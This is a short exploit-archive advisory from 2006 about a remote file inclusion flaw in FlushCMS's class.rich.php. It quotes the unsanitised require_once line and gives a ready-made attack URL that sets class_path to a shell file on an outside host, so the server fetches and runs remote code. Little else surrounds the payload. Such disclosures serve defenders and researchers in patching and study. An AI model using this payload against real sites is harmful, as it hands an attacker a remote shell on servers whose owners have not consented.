id: 580
date: 07/15/2006
title: FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability
author: igi
cves: 

======================================================================
FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability
======================================================================



flushcms  (tpath) Remote File Inclusion Vulnerability

virangar security team
www.virangar.org
www.virangar.net
Discoverd By : igi
contact  :  anti_hacker_online@yah00.com
for all member  virangar

bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------

simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?



#  0day.today [2023-03-22]  #